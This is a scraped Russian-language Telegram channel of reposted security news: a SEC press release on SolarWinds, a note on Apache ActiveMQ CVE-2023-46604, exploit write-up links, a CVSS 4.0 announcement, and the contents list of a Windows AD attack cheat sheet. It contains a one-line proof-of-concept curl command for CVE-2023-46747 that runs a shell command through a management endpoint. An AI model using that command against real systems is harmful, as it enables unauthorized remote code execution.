Склад
346 subscribers
360 photos
33 videos
62 files
951 links
Хранилка ссылок и документов
Download Telegram
Forwarded from Infosec and Risk Management docs, memes and shit
😁2👍1
Forwarded from infosec
😈 Эксплуатация Windows AD и справочник по командам.

• Эксплуатация
представляет собой последовательность действий, которая помогает атакующему получить доступ к исследуемой системе, используя уязвимость или ошибку в настройках. Сегодня, я поделюсь с тобой ссылкой на отличный Cheat Sheet для эксплуатации win #AD.

Что включает в себя справочник:
Обход PowerShell AMSI;
PowerShell one-liners;
Перечисления (Enumeration);
AD Enumeration с помощью PowerView;
AppLocker;
Ограниченный языковой режим PowerShell;
LAPS;
Боковое перемещение (Lateral Movement);
Боковое перемещение с помощью PowerView;
BloodHound;
Kerberoasting;
AS-REP roasting;
Token Manipulation;
Боковое перемещение с помощью Rubeus;
Боковое перемещение с помощью Mimikatz;
Выполнение команды с запланированными задачами;
Выполнение команд с помощью WMI;
Выполнение команд с помощью PowerShell Remoting;
Неограниченное делегирование;
Ограниченное делегирование;
Ограниченное делегирование на основе ресурсов;
Злоупотребление доверием к домену;
MSSQL и боковое перемещение;
Групповые политики и боковое перемещение;
Privilege Escalation;
PowerUp;
UAC Bypass;
Persistence;
Startup folder;
Domain Persistence;
Mimikatz skeleton key attack;
Права DCSync с помощью PowerView;
Domain Controller DSRM admin;
Изменение дескрипторов безопасности для удаленного доступа к WMI;
Изменение дескрипторов безопасности для удаленного доступа PowerShell;
Изменение дескрипторов безопасности реестра DC для удаленного извлечения хэша с помощью DAMP;
DCShadow;
Постэксплуатация;
LSASS protection;
Дамп учетных данных с помощью Mimikatz;
Злоупотребление DPAPI с помощью Mimikatz;
Dumping secrets without Mimikatz;
Windows Defender evasion;
Chisel proxying;
Juicy files.

#AD #ИБ #Hack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from club1337
👍1
Комиссия по ценным бумагам и биржам сегодня объявила об обвинениях против компании-разработчика программного обеспечения SolarWinds Corporation и ее главного сотрудника по информационной безопасности Тимоти Г. Брауна в мошенничестве и сбоях внутреннего контроля, связанных с якобы известными рисками и уязвимостями кибербезопасности. В жалобе утверждается, что, по крайней мере, с момента первичного публичного размещения акций в октябре 2018 года и по крайней мере до объявления в декабре 2020 года о том, что компания стала объектом масштабной, длившейся почти два года кибератаки, получившей название “SUNBURST”, SolarWinds и Brown обманывали инвесторов, завышая показатели кибербезопасности SolarWinds и занижая или не раскрывая известные риски. В своих заявлениях в SEC за этот период SolarWinds якобы ввела инвесторов в заблуждение, раскрывая только общие и гипотетические риски в то время, когда компания и Браун знали о конкретных недостатках в практике кибербезопасности SolarWinds, а также о растущих рисках, с которыми компания сталкивалась в то же время.

Как утверждается в жалобе, публичные заявления SolarWinds о своих методах обеспечения кибербезопасности и рисках противоречили ее внутренним оценкам, включая презентацию 2018 года, подготовленную инженером компании и распространенную внутри компании, в том числе с Брауном, о том, что настройка удаленного доступа SolarWinds была “не очень безопасной” и что кто-то использовал уязвимость “в принципе, может делать все, что угодно, без нашего обнаружения, пока не станет слишком поздно”, что может привести к “серьезным репутационным и финансовым потерям” для SolarWinds. Аналогичным образом, как утверждается в жалобе SEC, в презентациях Брауна за 2018 и 2019 годы говорилось, соответственно, что “текущее состояние безопасности оставляет нас в очень уязвимом состоянии для наших критически важных активов” и что “доступ и привилегии к критически важным системам / данным неуместны”.

Кроме того, в жалобе SEC утверждается, что многочисленные сообщения между сотрудниками SolarWinds, включая Брауна, в течение 2019 и 2020 годов ставили под сомнение способность компании защитить свои критически важные активы от кибератак. Например, согласно жалобе SEC, в июне 2020 года, расследуя кибератаку на клиента SolarWinds, Браун написал, что “очень беспокоит” тот факт, что злоумышленник, возможно, хотел использовать программное обеспечение SolarWinds Orion для более масштабных атак, потому что “наши серверные системы не настолько устойчивы”; и Во внутреннем документе, опубликованном в сентябре 2020 года, которым поделились Браун и другие, говорилось: “объем проблем безопасности, выявленных за последний месяц, превысил возможности инженерных групп по их устранению”.

В жалобе SEC утверждается, что Браун был осведомлен о рисках и уязвимостях SolarWinds в области кибербезопасности, но не смог решить проблемы или, иногда, в достаточной степени поднять их в компании. В результате этих упущений компания, как утверждается, также не смогла предоставить разумных гарантий того, что ее наиболее ценные активы, включая флагманский продукт Orion, были надлежащим образом защищены.

SolarWinds раскрыла неполную информацию об атаке SUNBURST в форме 8-K от 14 декабря 2020 года, после чего цена ее акций упала примерно на 25 процентов в течение следующих двух дней и примерно на 35 процентов к концу месяца.
👍1
“Мы утверждаем, что в течение многих лет SolarWinds и Brown игнорировали неоднократные предупреждения о киберрисках SolarWinds, которые были хорошо известны всей компании и привели одного из подчиненных Брауна к выводу: ”Мы так далеки от того, чтобы быть компанией, ориентированной на безопасность", - сказал Гурбир С. Гревал, директор подразделения SolarWinds. Отдел правоприменения SEC. “Вместо того, чтобы устранить эти уязвимости, SolarWinds и Brown развернули кампанию по созданию ложной картины среды киберконтроля компании, тем самым лишив инвесторов точной существенной информации. Сегодняшнее правоприменительное действие не только обвиняет SolarWinds и Brown в введении в заблуждение инвесторов и неспособности защитить активы компании, являющиеся ”жемчужиной короны", но и подчеркивает наше послание эмитентам: применяйте строгий контроль, соответствующий вашим рискам, и сообщайте инвесторам об известных опасениях ".

В жалобе SEC, поданной в Южный округ Нью-Йорка, утверждается, что SolarWinds и Brown нарушили положения о борьбе с мошенничеством Закона о ценных бумагах 1933 года и Закона о биржах ценных бумаг 1934 года; SolarWinds нарушила положения Закона о биржах об отчетности и внутреннем контроле; а Браун способствовал нарушениям компании. В жалобе испрашивается постоянный судебный запрет, аннулирование с процентами за предвзятое отношение, гражданские штрафы и запрет должностному лицу и директору выступать против Брауна.

Расследование SEC проводилось У. Брэдли Неем, Лори Стоун и Бенджамином Брутлагом при содействии Кристофера Брукмана и Кристен Уорден из судебного отдела и контролировалось Кэролин М. Уэлшханс и Мелиссой Р. Ходжман. Судебный процесс SEC будут вести мистер Брукманн и мисс Уорден под руководством Мелиссы Армстронг.

https://www.sec.gov/news/press-release/2023-227
👍1
CVE-2023-46747-POC

curl -sk -u 'ali:ali' -H 'Content-Type: application/json' -X POST \

-d '{"command": "run", "utilCmdArgs": "-c \"whoami\""}' \

https:///$IP:$PORT/mgmt/tm/util/bash

#poc #exploit
👍2
Вот это, похоже, громкая тема будет - RCE в Apache ActiveMQ (CVE-2023-46604). Что это вообще такое?

Apache ActiveMQ — брокер сообщений с открытым исходным кодом (распространяется под лицензией Apache 2.0), реализующий спецификацию JMS (Java Message Service) 1.1. Среди возможностей — кластеризация, возможность использовать для хранения сообщений различные СУБД, кэширование, ведение журналов.


Никогда раньше не сталкивался. 🤷‍♂️ Но вот у джавистов, похоже, достаточно популярная штука. Пишут, что 7к в Интернет торчат, 3к уязвимы. 🌝

Согласно описанию на NVD, уязвимость позволяет злоумышленнику с сетевым доступом выполнять произвольные shell команды. CVSS Base Score 10/10. Есть публичный PoC и рассказ Rapid7 о том, что уязвимость уже используется шифровальщиками. Причём там пошифровали Windows хосты. 🧐 Хороший повод поискать это у себя в инфре (если не на периметре 😉).

@avleonovrus #Apache #ActiveMQ #Rapid7
👍1
Forwarded from CyberSecurityTechnologies (-CST-)
#exploit
1. CVE-2023-34050:
Spring AMQP Deserialization RCE
https://blog.pyn3rd.com/2023/11/03/CVE-2023-34050-Spring-AMQP-Deserialization-Remote-Code-Execution

2. CVE-2023-20273:
IOS XE root priv escalation
https://blog.leakix.net/2023/10/cisco-root-privesc

3. Stealing OAuth tokens of connected Microsoft accounts via open redirect in Harvest App
https://eval.blog/research/microsoft-account-token-leaks-in-harvest
👍1
Forwarded from Sachok
Уязвимости наконец-то будут оценивать по-новому стандарту. Старый стандарт оценки уязвимости CVSS(Common Vulnerability Scoring System 4.0) в последний раз обновлялся 8 лет назад.

Новую версию CVSS 4.0 выпустила организация FIRST, объединяющая больше 650 организаций из более 100 стран.

Теперь базовые показатели стали более детализированными, неоднозначность оценки последующих уровней критичности устранена, а также повысилась эффективность оценки требований безопасности специфичных для конкретной среды.

CVSS 4.0 можно применять к IoT, OT, ICS. Новая номенклатура для подсчета оценки CVSS включает комбинации Base(CVSS-B), Base+Threat(CVSS-BT), Base+Enviromental(CVSS-BE), Base+Threat+Enviromental(CVSS-BTE).

В общем, сделали большой шаг вперед. Больше показателей и возможностей — более качественная аналитика угроз и точная оценка.

@cybersachok
👍1